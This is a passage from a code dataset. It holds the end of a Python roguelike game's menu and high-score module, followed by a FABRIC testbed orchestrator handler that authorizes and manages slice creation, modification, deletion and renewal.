'{}'.rjust(11).format(player.exp))\n    print('#', 'Enemies killed:'.rjust(19),\n          '{}'.rjust(11).format(player.enemies_killed))\n    print('#')\n    print('=============================================')\n    print('\\nTo exit press any key.\\n')\n    getch()\n    \ndef hall_of_fame(player):\n    score = player.enemies_killed*player.level + player.lifes + player.exp\n    hscores = []\n    with open('hscores') as table:\n        for line in table:\n            hscores.append(line.split(','))\n    if score >= int(hscores[0][0]):\n        to_write = str(score) + ',' + str(player.name)\n        print('TOP SCORE : ', player.name, \": \", score)\n        with open('hscores','w') as table:\n            table.write(to_write)\n    else:\n        print('TOP SCORE : ', hscores[0][1], \": \", hscores[0][0])","repo_name":"DrMayx/RougeGameG14","sub_path":"menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"25656818461","text":"import time\nimport traceback\nfrom datetime import datetime, timedelta, timezone\nfrom http.client import NOT_FOUND, BAD_REQUEST, UNAUTHORIZED\nfrom typing import List, Dict, Tuple\n\nfrom fabric_mb.message_bus.messages.auth_avro import AuthAvro\nfrom fabric_mb.message_bus.messages.poa_avro import PoaAvro\nfrom fabric_mb.message_bus.messages.reservation_mng import ReservationMng\nfrom 
fabric_mb.message_bus.messages.slice_avro import SliceAvro\nfrom fim.graph.networkx_property_graph_disjoint import NetworkXGraphImporterDisjoint\nfrom fim.slivers.base_sliver import BaseSliver\nfrom fim.slivers.network_service import NetworkServiceSliver\nfrom fim.user import GraphFormat\nfrom fim.user.topology import ExperimentTopology\n\nfrom fabric_cf.actor.core.common.event_logger import EventLogger, EventLoggerSingleton\nfrom fabric_cf.actor.core.kernel.poa import PoaStates\nfrom fabric_cf.actor.core.kernel.reservation_states import ReservationStates\nfrom fabric_cf.actor.core.time.actor_clock import ActorClock\nfrom fabric_cf.actor.fim.fim_helper import FimHelper\nfrom fabric_cf.actor.core.apis.abc_mgmt_controller_mixin import ABCMgmtControllerMixin\nfrom fabric_cf.actor.core.common.constants import Constants, ErrorCodes\nfrom fabric_cf.actor.core.kernel.slice_state_machine import SliceState\nfrom fabric_cf.actor.core.util.id import ID\nfrom fabric_cf.actor.security.fabric_token import FabricToken\nfrom fabric_cf.actor.security.pdp_auth import ActionId\nfrom fabric_cf.orchestrator.core.exceptions import OrchestratorException\nfrom fabric_cf.orchestrator.core.orchestrator_slice_wrapper import OrchestratorSliceWrapper\nfrom fabric_cf.orchestrator.core.orchestrator_kernel import OrchestratorKernelSingleton\nfrom fabric_cf.orchestrator.core.response_builder import ResponseBuilder\n\n\nclass OrchestratorHandler:\n def __init__(self):\n self.controller_state = OrchestratorKernelSingleton.get()\n from fabric_cf.actor.core.container.globals import GlobalsSingleton\n self.globals = GlobalsSingleton.get()\n self.logger = self.globals.get_logger()\n self.jwks_url = self.globals.get_config().get_oauth_config().get(Constants.PROPERTY_CONF_O_AUTH_JWKS_URL, None)\n self.pdp_config = self.globals.get_config().get_global_config().get_pdp_config()\n\n def get_logger(self):\n \"\"\"\n Get Logger\n :return: logger\n \"\"\"\n return self.logger\n\n def __authorize_request(self, *, id_token: str, action_id: ActionId,\n resource: BaseSliver or ExperimentTopology = None,\n lease_end_time: datetime = None) -> FabricToken:\n \"\"\"\n Authorize request\n :param id_token:\n :param action_id:\n :param resource:\n :param lease_end_time:\n :return:\n \"\"\"\n from fabric_cf.actor.security.access_checker import AccessChecker\n fabric_token = AccessChecker.check_access(action_id=action_id, token=id_token, logger=self.logger,\n resource=resource, lease_end_time=lease_end_time)\n\n if fabric_token.get_subject() is None:\n raise OrchestratorException(http_error_code=UNAUTHORIZED,message=\"Invalid token\")\n return fabric_token\n\n def get_broker(self, *, controller: ABCMgmtControllerMixin) -> ID:\n \"\"\"\n Get broker\n :param controller:\n :return:\n \"\"\"\n try:\n if self.controller_state.get_broker() is not None:\n return self.controller_state.get_broker()\n\n brokers = controller.get_brokers()\n self.logger.debug(f\"Brokers: {brokers}\")\n self.logger.error(f\"Last Error: {controller.get_last_error()}\")\n if brokers is not None:\n result = ID(uid=next(iter(brokers), None).get_guid())\n self.controller_state.set_broker(broker=result)\n return result\n except Exception as e:\n self.logger.error(f\"Error occurred: {e}\", stack_info=True)\n\n def discover_broker_query_model(self, *, controller: ABCMgmtControllerMixin, token: str = None,\n level: int = 10, graph_format: GraphFormat = GraphFormat.GRAPHML,\n force_refresh: bool = False) -> str or None:\n \"\"\"\n Discover all the available resources by querying Broker\n 
:param controller Management Controller Object\n :param token Fabric Token\n :param level: level of details\n :param graph_format: Graph format\n :param force_refresh: Force fetching a fresh model from Broker\n :return str or None\n \"\"\"\n broker_query_model = None\n saved_bqm = self.controller_state.get_saved_bqm(graph_format=graph_format, level=level)\n if saved_bqm is not None:\n if not force_refresh and not saved_bqm.can_refresh() and not saved_bqm.refresh_in_progress:\n broker_query_model = saved_bqm.get_bqm()\n else:\n saved_bqm.start_refresh()\n\n if broker_query_model is None:\n broker = self.get_broker(controller=controller)\n if broker is None:\n raise OrchestratorException(\"Unable to determine broker proxy for this controller. \"\n \"Please check Orchestrator container configuration and logs.\")\n\n model = controller.get_broker_query_model(broker=broker, id_token=token, level=level,\n graph_format=graph_format)\n if model is None or model.get_model() is None or model.get_model() == '':\n raise OrchestratorException(http_error_code=NOT_FOUND, message=f\"Resource(s) not found for \"\n f\"level: {level} format: {graph_format}!\")\n broker_query_model = model.get_model()\n\n self.controller_state.save_bqm(bqm=broker_query_model, graph_format=graph_format, level=level)\n\n return broker_query_model\n\n def list_resources(self, *, token: str, level: int, force_refresh: bool = False) -> dict:\n \"\"\"\n List Resources\n :param token Fabric Identity Token\n :param level: level of details (default set to 1)\n :param force_refresh: force fetching bqm from broker and override the cached model\n :raises Raises an exception in case of failure\n :returns Broker Query Model on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"list_resources invoked controller:{controller}\")\n\n self.__authorize_request(id_token=token, action_id=ActionId.query)\n \n broker_query_model = self.discover_broker_query_model(controller=controller, token=token, level=level,\n force_refresh=force_refresh)\n\n return ResponseBuilder.get_broker_query_model_summary(bqm=broker_query_model)\n\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing list_resources e: {e}\")\n raise e\n\n def portal_list_resources(self, *, graph_format_str: str) -> dict:\n \"\"\"\n List Resources\n :param graph_format_str: Graph format\n :raises Raises an exception in case of failure\n :returns Broker Query Model on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"portal_list_resources invoked controller:{controller}\")\n\n broker_query_model = None\n graph_format = self.__translate_graph_format(graph_format=graph_format_str)\n broker_query_model = self.discover_broker_query_model(controller=controller, level=1,\n graph_format=graph_format)\n return ResponseBuilder.get_broker_query_model_summary(bqm=broker_query_model)\n\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing portal_list_resources e: {e}\")\n raise e\n\n def create_slice(self, *, token: str, slice_name: str, slice_graph: str, ssh_key: str,\n lease_end_time: str) -> List[dict]:\n \"\"\"\n Create a slice\n :param token Fabric Identity Token\n :param slice_name Slice Name\n :param slice_graph Slice Graph Model\n :param ssh_key: User ssh key\n :param lease_end_time: Lease End Time (UTC)\n :raises Raises an exception in case of 
failure\n :returns List of reservations created for the Slice on success\n \"\"\"\n start = time.time()\n slice_id = None\n controller = None\n new_slice_object = None\n asm_graph = None\n topology = None\n try:\n from fabric_cf.actor.security.access_checker import AccessChecker\n fabric_token = AccessChecker.validate_and_decode_token(token=token, logger=self.logger)\n project, tags, project_name = fabric_token.get_first_project()\n allow_long_lived = True if Constants.SLICE_NO_LIMIT_LIFETIME in tags else False\n end_time = self.__validate_lease_end_time(lease_end_time=lease_end_time, allow_long_lived=allow_long_lived)\n\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"create_slice invoked for Controller: {controller}\")\n\n # Validate the slice graph\n create_ts = time.time()\n topology = ExperimentTopology(graph_string=slice_graph, importer=NetworkXGraphImporterDisjoint())\n topology.validate()\n self.logger.info(f\"TV validate: TIME= {time.time() - create_ts:.0f}\")\n\n create_ts = time.time()\n asm_graph = FimHelper.get_neo4j_asm_graph(slice_graph=topology.serialize())\n self.logger.info(f\"ASM load: TIME= {time.time() - create_ts:.0f}\")\n\n # Authorize the slice\n create_ts = time.time()\n self.__authorize_request(id_token=token, action_id=ActionId.create, resource=topology,\n lease_end_time=end_time)\n self.logger.info(f\"PDP authorize: TIME= {time.time() - create_ts:.0f}\")\n\n # Check if an Active slice exists already with the same name for the user\n create_ts = time.time()\n if tags is not None and isinstance(tags, list):\n tags = ','.join(tags)\n existing_slices = controller.get_slices(slice_name=slice_name, email=fabric_token.get_email(),\n project=project)\n self.logger.info(f\"GET slices: TIME= {time.time() - create_ts:.0f}\")\n\n if existing_slices is not None and len(existing_slices) != 0:\n for es in existing_slices:\n slice_state = SliceState(es.get_state())\n if not SliceState.is_dead_or_closing(state=slice_state):\n raise OrchestratorException(f\"Slice {slice_name} already exists\")\n\n broker = self.get_broker(controller=controller)\n if broker is None:\n raise OrchestratorException(\"Unable to determine broker proxy for this controller. 
\"\n \"Please check Orchestrator container configuration and logs.\")\n\n slice_obj = SliceAvro()\n slice_obj.set_slice_name(slice_name)\n slice_obj.set_client_slice(True)\n slice_obj.set_description(\"Description\")\n slice_obj.graph_id = asm_graph.get_graph_id()\n slice_obj.set_config_properties(value={Constants.USER_SSH_KEY: ssh_key,\n Constants.PROJECT_ID: project,\n Constants.TAGS: tags,\n Constants.CLAIMS_EMAIL: fabric_token.get_email()})\n slice_obj.set_lease_end(lease_end=end_time)\n auth = AuthAvro()\n auth.name = self.controller_state.get_management_actor().get_name()\n auth.guid = self.controller_state.get_management_actor().get_guid()\n auth.oidc_sub_claim = fabric_token.get_uuid()\n auth.email = fabric_token.get_email()\n slice_obj.set_owner(auth)\n slice_obj.set_project_id(project)\n slice_obj.set_project_name(project_name)\n\n create_ts = time.time()\n self.logger.debug(f\"Adding Slice {slice_name}\")\n slice_id = controller.add_slice(slice_obj=slice_obj)\n self.logger.info(f\"SLC add slices: TIME= {time.time() - create_ts:.0f}\")\n if slice_id is None:\n self.logger.error(controller.get_last_error())\n self.logger.error(\"Slice could not be added to Database\")\n raise OrchestratorException(\"Slice could not be added to Database\")\n self.logger.debug(f\"Slice {slice_name}/{slice_id} added successfully\")\n\n slice_obj.set_slice_id(slice_id=str(slice_id))\n new_slice_object = OrchestratorSliceWrapper(controller=controller, broker=broker,\n slice_obj=slice_obj, logger=self.logger)\n\n create_ts = time.time()\n new_slice_object.lock()\n\n # Create Slivers from Slice Graph; Compute Reservations from Slivers;\n computed_reservations = new_slice_object.create(slice_graph=asm_graph)\n\n # Check if Testbed in Maintenance or Site in Maintenance\n self.check_maintenance_mode(token=fabric_token, reservations=computed_reservations)\n\n # Add Reservations to relational database;\n new_slice_object.add_reservations()\n\n self.logger.info(f\"OC wrapper: TIME= {time.time() - create_ts:.0f}\")\n\n # Enqueue the slice on the demand thread\n # Demand thread is responsible for demanding the reservations\n # Helps improve the create response time\n create_ts = time.time()\n self.controller_state.get_defer_thread().queue_slice(controller_slice=new_slice_object)\n self.logger.info(f\"QU queue: TIME= {time.time() - create_ts:.0f}\")\n EventLoggerSingleton.get().log_slice_event(slice_object=slice_obj, action=ActionId.create,\n topology=topology)\n\n return ResponseBuilder.get_reservation_summary(res_list=computed_reservations)\n except Exception as e:\n if slice_id is not None and controller is not None and asm_graph is not None:\n FimHelper.delete_graph(graph_id=asm_graph.graph_id)\n controller.remove_slice(slice_id=slice_id)\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing create_slice e: {e}\")\n raise e\n finally:\n if topology is not None and topology.graph_model is not None:\n topology.graph_model.delete_graph()\n if new_slice_object is not None:\n new_slice_object.unlock()\n self.logger.info(f\"OH : TIME= {time.time() - start:.0f}\")\n\n def get_slivers(self, *, token: str, slice_id: str, sliver_id: str = None, as_self: bool = True) -> List[dict]:\n \"\"\"\n Get Slivers for a Slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :param sliver_id Sliver Id\n :param as_self flag; True - return calling user's slivers otherwise, return all slivers in the project\n :raises Raises an exception in case of failure\n :returns List of 
reservations created for the Slice on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"get_slivers invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n rid = ID(uid=sliver_id) if sliver_id is not None else None\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.query)\n\n # Filter slices based on user's email only when querying as_self\n email = fabric_token.get_email()\n if not as_self:\n email = None\n\n reservations = controller.get_reservations(slice_id=slice_guid, rid=rid, email=email)\n if reservations is None:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n if controller.get_last_error().status.code == ErrorCodes.ErrorNoSuchSlice:\n raise OrchestratorException(f\"Slice# {slice_id} not found\",\n http_error_code=NOT_FOUND)\n elif controller.get_last_error().status.code == ErrorCodes.ErrorNoSuchReservation:\n raise OrchestratorException(f\"Reservation# {rid} not found\",\n http_error_code=NOT_FOUND)\n\n raise OrchestratorException(f\"Slice# {slice_id} has no reservations\",\n http_error_code=NOT_FOUND)\n\n return ResponseBuilder.get_reservation_summary(res_list=reservations)\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing get_slivers e: {e}\")\n raise e\n\n def get_slices(self, *, token: str, states: List[str], name: str, limit: int, offset: int,\n as_self: bool = True) -> List[dict]:\n \"\"\"\n Get User Slices\n :param token Fabric Identity Token\n :param states Slice states\n :param name Slice name\n :param limit Number of slices to return\n :param offset Offset\n :param as_self flag; True - return calling user's slices otherwise, return all slices in the project\n :raises Raises an exception in case of failure\n :returns List of Slices on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"get_slices invoked for Controller: {controller}\")\n\n slice_states = SliceState.translate_list(states=states)\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.query)\n\n projects = fabric_token.get_projects()\n project = None\n if len(projects) == 1:\n project, tags, project_name = fabric_token.get_first_project()\n else:\n as_self = True\n\n # Filter slices based on user's email only when querying as_self\n email = fabric_token.get_email()\n if not as_self:\n email = None\n slice_list = controller.get_slices(states=slice_states, email=email, project=project,\n slice_name=name, limit=limit, offset=offset)\n return ResponseBuilder.get_slice_summary(slice_list=slice_list)\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing get_slices e: {e}\")\n raise e\n\n def modify_slice(self, *, token: str, slice_id: str, slice_graph: str) -> List[dict]:\n \"\"\"\n Modify a slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :param slice_graph Slice Graph Model\n :param ssh_key ssh_key\n :raises Raises an exception in case of failure\n :returns List of reservations created for the Slice on success\n \"\"\"\n asm_graph = None\n topology = None\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"modify_slice invoked for Controller: {controller}\")\n\n # Check if an Active slice exists already with the same name for the user\n slice_list = 
controller.get_slices(slice_id=slice_id)\n if slice_list is None or len(slice_list) == 0:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n raise OrchestratorException(f\"User# has no Slices\",\n http_error_code=NOT_FOUND)\n\n slice_obj = next(iter(slice_list))\n if slice_obj.get_graph_id() is None:\n raise OrchestratorException(f\"Slice# {slice_obj} does not have graph id\")\n\n slice_state = SliceState(slice_obj.get_state())\n\n if not SliceState.is_stable(state=slice_state):\n self.logger.info(f\"Unable to modify Slice# {slice_id} that is not yet stable, try again later\")\n raise OrchestratorException(f\"Unable to modify Slice# {slice_id} that is not yet stable, \"\n f\"try again later\")\n\n # Validate the slice graph\n topology = ExperimentTopology(graph_string=slice_graph, importer=NetworkXGraphImporterDisjoint())\n topology.validate()\n\n asm_graph = FimHelper.get_neo4j_asm_graph(slice_graph=topology.serialize())\n\n # Authorize the slice\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.modify, resource=topology)\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.create, resource=topology)\n project, tags, project_name = fabric_token.get_first_project()\n broker = self.get_broker(controller=controller)\n if broker is None:\n raise OrchestratorException(\"Unable to determine broker proxy for this controller. \"\n \"Please check Orchestrator container configuration and logs.\")\n\n slice_object = OrchestratorSliceWrapper(controller=controller, broker=broker,\n slice_obj=slice_obj, logger=self.logger)\n\n # Compute the reservations\n computed_reservations = slice_object.modify(new_slice_graph=asm_graph)\n\n # Check if Test Bed or site is in maintenance\n self.check_maintenance_mode(token=fabric_token, reservations=computed_reservations)\n\n # Add any new reservations to the database\n slice_object.add_reservations()\n\n FimHelper.delete_graph(graph_id=slice_obj.get_graph_id())\n\n slice_obj.graph_id = asm_graph.get_graph_id()\n config_props = slice_obj.get_config_properties()\n config_props[Constants.PROJECT_ID] = project\n config_props[Constants.TAGS] = ','.join(tags)\n slice_obj.set_config_properties(value=config_props)\n\n if not controller.update_slice(slice_obj=slice_obj, modify_state=True):\n self.logger.error(f\"Failed to update slice: {slice_id} error: {controller.get_last_error()}\")\n\n # Enqueue the slice on the demand thread\n # Demand thread is responsible for demanding the reservations\n # Helps improve the create response time\n self.controller_state.get_defer_thread().queue_slice(controller_slice=slice_object)\n\n EventLoggerSingleton.get().log_slice_event(slice_object=slice_obj, action=ActionId.modify,\n topology=topology)\n return ResponseBuilder.get_reservation_summary(res_list=computed_reservations)\n except Exception as e:\n if asm_graph is not None:\n FimHelper.delete_graph(graph_id=asm_graph.get_graph_id())\n\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing modify_slice e: {e}\")\n raise e\n finally:\n if topology is not None and topology.graph_model is not None:\n topology.graph_model.delete_graph()\n\n def delete_slices(self, *, token: str, slice_id: str = None):\n \"\"\"\n Delete a user slice identified by slice_id if specified otherwise all user slices within a project\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :raises Raises an exception in case of failure\n \"\"\"\n try:\n 
failed_to_delete_slice_ids = []\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"delete_slice invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.delete)\n project, tags, project_name = fabric_token.get_first_project()\n\n self.logger.debug(f\"Get Slices: {project} {fabric_token.get_email()} \")\n states = None\n if slice_guid is None:\n states = [SliceState.StableError.value,\n SliceState.StableOK.value,\n SliceState.ModifyOK.value,\n SliceState.ModifyError.value]\n slice_list = controller.get_slices(slice_id=slice_guid, email=fabric_token.get_email(),\n project=project, states=states)\n\n if slice_list is None or len(slice_list) == 0:\n if slice_id is not None:\n msg = f\"Slice# {slice_id} not found\"\n raise OrchestratorException(msg, http_error_code=NOT_FOUND)\n\n self.__authorize_request(id_token=token, action_id=ActionId.delete)\n\n for slice_object in slice_list:\n slice_state = SliceState(slice_object.get_state())\n if SliceState.is_dead_or_closing(state=slice_state):\n self.logger.debug(f\"Slice# {slice_object.get_slice_id()} already closed\")\n continue\n\n if not SliceState.is_stable(state=slice_state) and not SliceState.is_modified(state=slice_state):\n self.logger.info(f\"Unable to delete Slice# {slice_object.get_slice_id()} that is not yet stable, \"\n f\"try again later\")\n failed_to_delete_slice_ids.append(slice_object.get_slice_id())\n continue\n\n controller.close_reservations(slice_id=ID(uid=slice_object.get_slice_id()))\n if len(failed_to_delete_slice_ids) > 0:\n raise OrchestratorException(f\"Unable to delete Slices {failed_to_delete_slice_ids} that are not yet \"\n f\"stable, try again later\")\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing delete_slice e: {e}\")\n raise e\n\n def modify_accept(self, *, token: str, slice_id: str) -> dict:\n \"\"\"\n Accept the last modify on the slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :raises Raises an exception in case of failure\n :returns Slice Graph on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"modify_accept invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n\n # TODO change this to accept\n self.__authorize_request(id_token=token, action_id=ActionId.modify)\n\n slice_list = controller.get_slices(slice_id=slice_guid)\n if slice_list is None or len(slice_list) == 0:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n raise OrchestratorException(f\"User# has no Slices\",\n http_error_code=NOT_FOUND)\n\n slice_obj = next(iter(slice_list))\n slice_state = SliceState(slice_obj.get_state())\n if not SliceState.is_modified(state=slice_state):\n self.logger.info(f\"Unable to accept modify Slice# {slice_guid} that was not modified\")\n raise OrchestratorException(f\"Unable to accept modify Slice# {slice_guid} that was not modified\")\n\n if slice_obj.get_graph_id() is None:\n raise OrchestratorException(f\"Slice# {slice_obj} does not have graph id\")\n\n slice_topology = FimHelper.prune_graph(graph_id=slice_obj.get_graph_id())\n\n controller.accept_update_slice(slice_id=ID(uid=slice_id))\n\n slice_model_str = slice_topology.serialize()\n return ResponseBuilder.get_slice_summary(slice_list=slice_list, 
slice_model=slice_model_str)[0]\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing modify_accept e: {e}\")\n raise e\n\n def get_slice_graph(self, *, token: str, slice_id: str, graph_format_str: str, as_self: bool) -> dict:\n \"\"\"\n Get User Slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :param graph_format_str\n :param as_self flag; True - return calling user's slices otherwise, return all slices in the project\n :raises Raises an exception in case of failure\n :returns Slice Graph on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"get_slice_graph invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.query)\n\n # Filter slices based on user's email only when querying as_self\n email = fabric_token.get_email()\n if not as_self:\n email = None\n\n slice_list = controller.get_slices(slice_id=slice_guid, email=email)\n if slice_list is None or len(slice_list) == 0:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n raise OrchestratorException(f\"User# has no Slices\",\n http_error_code=NOT_FOUND)\n\n slice_obj = next(iter(slice_list))\n\n if slice_obj.get_graph_id() is None:\n raise OrchestratorException(f\"Slice# {slice_obj} does not have graph id\")\n\n slice_model = FimHelper.get_graph(graph_id=slice_obj.get_graph_id())\n\n graph_format = self.__translate_graph_format(graph_format=graph_format_str)\n if graph_format == GraphFormat.JSON_NODELINK:\n slice_model_str = slice_model.serialize_graph()\n slice_model = FimHelper.get_networkx_graph_from_string(graph_str=slice_model_str)\n\n if slice_model is None:\n raise OrchestratorException(f\"Slice# {slice_obj} graph could not be loaded\")\n\n slice_model_str = slice_model.serialize_graph(format=graph_format)\n return ResponseBuilder.get_slice_summary(slice_list=slice_list, slice_model=slice_model_str)[0]\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing get_slice_graph e: {e}\")\n raise e\n\n def renew_slice(self, *, token: str, slice_id: str, new_lease_end_time: str):\n \"\"\"\n Renew a slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :param new_lease_end_time: New Lease End Time in UTC in '%Y-%m-%d %H:%M:%S %z' format\n :raises Raises an exception in case of failure\n :return:\n \"\"\"\n failed_to_extend_rid_list = []\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"renew_slice invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n slice_list = controller.get_slices(slice_id=slice_guid)\n\n if slice_list is None or len(slice_list) == 0:\n raise OrchestratorException(f\"Slice# {slice_id} not found\",\n http_error_code=NOT_FOUND)\n\n slice_object = next(iter(slice_list))\n\n slice_state = SliceState(slice_object.get_state())\n if SliceState.is_dead_or_closing(state=slice_state):\n raise OrchestratorException(f\"Slice# {slice_id} already closed\",\n http_error_code=BAD_REQUEST)\n\n if not SliceState.is_stable(state=slice_state) and not SliceState.is_modified(state=slice_state):\n self.logger.info(f\"Unable to renew Slice# {slice_guid} that is not yet stable, try again later\")\n raise OrchestratorException(f\"Unable to renew 
Slice# {slice_guid} that is not yet stable, \"\n f\"try again later\")\n\n from fabric_cf.actor.security.access_checker import AccessChecker\n fabric_token = AccessChecker.validate_and_decode_token(token=token, logger=self.logger)\n project, tags, project_name = fabric_token.get_first_project()\n allow_long_lived = True if Constants.SLICE_NO_LIMIT_LIFETIME in tags else False\n new_end_time = self.__validate_lease_end_time(lease_end_time=new_lease_end_time,\n allow_long_lived=allow_long_lived)\n\n reservations = controller.get_reservations(slice_id=slice_id)\n if reservations is None or len(reservations) < 1:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n raise OrchestratorException(f\"Slice# {slice_id} has no reservations\")\n\n self.logger.debug(f\"There are {len(reservations)} reservations in the slice# {slice_id}\")\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.renew, lease_end_time=new_end_time)\n self.check_maintenance_mode(token=fabric_token, reservations=reservations)\n for r in reservations:\n res_state = ReservationStates(r.get_state())\n if res_state == ReservationStates.Closed or res_state == ReservationStates.Failed or \\\n res_state == ReservationStates.CloseWait:\n continue\n\n current_end_time = ActorClock.from_milliseconds(milli_seconds=r.get_end())\n\n if new_end_time < current_end_time:\n raise OrchestratorException(f\"Attempted new term end time is shorter than current slice end time\")\n\n self.logger.debug(f\"Extending reservation with reservation# {r.get_reservation_id()}\")\n result = controller.extend_reservation(reservation=ID(uid=r.get_reservation_id()),\n new_end_time=new_end_time,\n sliver=None)\n if not result:\n self.logger.error(f\"Error: {controller.get_last_error()}\")\n failed_to_extend_rid_list.append(r.get_reservation_id())\n\n if len(failed_to_extend_rid_list) == 0:\n slice_object.set_lease_end(lease_end=new_end_time)\n if not controller.update_slice(slice_obj=slice_object):\n self.logger.error(f\"Failed to update lease end time: {new_end_time} in Slice: {slice_object}\")\n self.logger.error(controller.get_last_error())\n\n if len(failed_to_extend_rid_list) > 0:\n raise OrchestratorException(f\"Failed to extend reservation# {failed_to_extend_rid_list}\")\n\n EventLoggerSingleton.get().log_slice_event(slice_object=slice_object, action=ActionId.renew)\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing renew e: {e}\")\n raise e\n\n def __validate_lease_end_time(self, lease_end_time: str, allow_long_lived: bool = False) -> datetime:\n \"\"\"\n Validate Lease End Time\n :param lease_end_time: New End Time\n :param allow_long_lived: Allow long lived tokens\n :return End Time\n :raises Exception if new end time is in past\n \"\"\"\n if lease_end_time is None:\n new_end_time = datetime.now(timezone.utc) + timedelta(hours=Constants.DEFAULT_LEASE_IN_HOURS)\n return new_end_time\n try:\n new_end_time = datetime.strptime(lease_end_time, Constants.LEASE_TIME_FORMAT)\n except Exception as e:\n raise OrchestratorException(f\"Lease End Time is not in format {Constants.LEASE_TIME_FORMAT}\",\n http_error_code=BAD_REQUEST)\n\n now = datetime.now(timezone.utc)\n if new_end_time <= now:\n raise OrchestratorException(f\"New term end time {new_end_time} is in the past! 
\",\n http_error_code=BAD_REQUEST)\n\n if allow_long_lived:\n default_long_lived_duration = Constants.LONG_LIVED_SLICE_TIME_WEEKS\n else:\n default_long_lived_duration = Constants.DEFAULT_MAX_DURATION\n if (new_end_time - now) > default_long_lived_duration:\n self.logger.info(f\"New term end time {new_end_time} exceeds system default \"\n f\"{default_long_lived_duration}, setting to system default: \")\n\n new_end_time = now + default_long_lived_duration\n\n return new_end_time\n\n @staticmethod\n def __translate_graph_format(*, graph_format: str) -> GraphFormat:\n if graph_format == GraphFormat.GRAPHML.name:\n return GraphFormat.GRAPHML\n elif graph_format == GraphFormat.JSON_NODELINK.name:\n return GraphFormat.JSON_NODELINK\n elif graph_format == GraphFormat.CYTOSCAPE.name:\n return GraphFormat.CYTOSCAPE\n else:\n return GraphFormat.GRAPHML\n\n def check_maintenance_mode(self, *, token: FabricToken, reservations: List[ReservationMng] = None):\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"check_maintenance_mode invoked for Controller: {controller}\")\n\n project, tags, project_name = token.get_first_project()\n\n if not controller.is_slice_provisioning_allowed(project=project, email=token.get_email()):\n raise OrchestratorException(Constants.MAINTENANCE_MODE_ERROR,\n http_error_code=Constants.INTERNAL_SERVER_ERROR_MAINT_MODE)\n\n if reservations is not None:\n for r in reservations:\n sliver = r.get_sliver()\n if not isinstance(sliver, NetworkServiceSliver):\n worker = None\n if sliver.get_labels() is not None and sliver.get_labels().instance_parent is not None:\n worker = sliver.get_labels().instance_parent\n status, message = controller.is_sliver_provisioning_allowed(project=project,\n site=sliver.get_site(),\n email=token.get_email(),\n worker=worker)\n if not status:\n raise OrchestratorException(message=message,\n http_error_code=Constants.INTERNAL_SERVER_ERROR_MAINT_MODE)\n\n def poa(self, *, token: str, sliver_id: str, poa: PoaAvro) -> Tuple[str, str]:\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"poa invoked for Controller: {controller}\")\n\n rid = ID(uid=sliver_id) if sliver_id is not None else None\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.modify)\n email = fabric_token.get_email()\n project, tags, project_name = fabric_token.get_first_project()\n\n auth = AuthAvro()\n auth.name = self.controller_state.get_management_actor().get_name()\n auth.guid = self.controller_state.get_management_actor().get_guid()\n auth.oidc_sub_claim = fabric_token.get_uuid()\n auth.email = fabric_token.get_email()\n poa.auth = auth\n poa.project_id = project\n poa.rid = sliver_id\n\n reservations = controller.get_reservations(rid=rid, email=email)\n if reservations is None or len(reservations) != 1:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n if controller.get_last_error().status.code == 